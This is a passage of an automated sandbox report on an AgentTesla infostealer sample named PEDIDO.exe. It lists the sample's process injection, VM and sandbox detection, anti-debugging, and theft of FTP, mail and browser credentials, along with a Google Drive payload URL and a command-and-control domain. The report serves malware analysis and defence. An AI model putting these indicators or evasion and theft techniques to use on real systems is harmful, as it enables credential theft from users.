            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\PEDIDO.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1G3ZUBGFP3XG7UQ2AO6_GNM0HCT-90HBP
            Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: PEDIDO.exe, 00000001.00000002.69377229117.0000000000763000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEX;V
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5260Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9948
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PEDIDO.exeSystem information queried: ModuleInformation
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: PEDIDO.exe, 00000001.00000002.69377229117.0000000000763000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exex;v
            Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000006.00000002.74031926505.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A46950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B30000
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1664 Sample: PEDIDO.exe Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 23 tccinfaes.com 2->23 25 mail.tccinfaes.com 2->25 27 4 other IPs or domains 2->27 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 39 Antivirus detection for URL or domain 2->39 41 4 other signatures 2->41 8 PEDIDO.exe 1 2->8         started        signatures3 process4 signatures5 43 Writes to foreign memory regions 8->43 45 Tries to detect Any.run 8->45 47 Hides threads from debuggers 8->47 11 RegAsm.exe 11 8->11         started        15 RegAsm.exe 8->15         started        17 RegAsm.exe 8->17         started        19 RegAsm.exe 8->19         started        process6 dnsIp7 29 tccinfaes.com 188.93.227.195, 49827, 587 CLARANET-ASClaraNETLTDGB Portugal 11->29 31 googlehosted.l.googleusercontent.com 142.250.181.225, 443, 49796 GOOGLEUS United States 11->31 33 drive.google.com 172.217.168.46, 443, 49795 GOOGLEUS United States 11->33 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 59 3 other signatures 11->59 21 conhost.exe 11->21         started        55 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->55 57 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->57 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            tccinfaes.com3%VirustotalBrowse
            mail.tccinfaes.com11%VirustotalBrowse
            x1.i.lencr.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://x1.i.lencr.org/0%VirustotalBrowse
            http://x1.i.lencr.org/0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://tccinfaes.com0%Avira URL Cloudsafe
            http://1rfE3t8xqRYG9cY.nett-0%Avira URL Cloudsafe
            http://GkEcfT.com0%Avira URL Cloudsafe
            http://x1.i.lencr.org/D0%Avira URL Cloudsafe
            http://mail.tccinfaes.com100%Avira URL Cloudmalware
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://x1.i.lencr.org/:Z0%Avira URL Cloudsafe
            http://1rfE3t8xqRYG9cY.netD0%Avira URL Cloudsafe
            http://x1.i.lencr.org:80/=0%Avira URL Cloudsafe
            http://1rfE3t8xqRYG9cY.net0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0)0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tccinfaes.com
            188.93.227.195
            truetrueunknown
            drive.google.com
            172.217.168.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.181.225
              truefalse
                high
                doc-0g-as-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  mail.tccinfaes.com
                  unknown
                  unknowntrueunknown
                  x1.i.lencr.org
                  unknown
                  unknownfalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=downloadfalse
                    high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://doc-0g-as-docs.googleusercontent.com/RegAsm.exe, 00000006.00000002.74031926505.0000000000EB8000.00000004.00000020.sdmpfalse
                      high
                      http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://x1.i.lencr.org/RegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.6.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://DynDns.comDynDNSRegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://cps.letsencrypt.org0RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tccinfaes.comRegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000006.00000002.74042361635.000000001DCB3000.00000004.00000001.sdmpfalse
                        high
                        http://1rfE3t8xqRYG9cY.nett-RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://GkEcfT.comRegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://x1.i.lencr.org/DRegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-0g-as-docs.googleusercontent.com/%%doc-0g-as-docs.googleusercontent.comRegAsm.exe, 00000006.00000003.69349876616.0000000000EE7000.00000004.00000001.sdmpfalse
                          high
                          http://mail.tccinfaes.comRegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://drive.google.com/RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmpfalse
                            high
                            http://x1.c.lencr.org/0RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.i.lencr.org/0RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujRegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpfalse
                              high
                              http://r3.o.lencr.org0RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://x1.i.lencr.org/:ZRegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://drive.google.com/nRegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmpfalse
                                high
                                http://1rfE3t8xqRYG9cY.netDRegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://x1.i.lencr.org:80/=RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://1rfE3t8xqRYG9cY.netRegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000003.70287265297.0000000000F61000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74043481824.000000001DD48000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://r3.i.lencr.org/0)RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

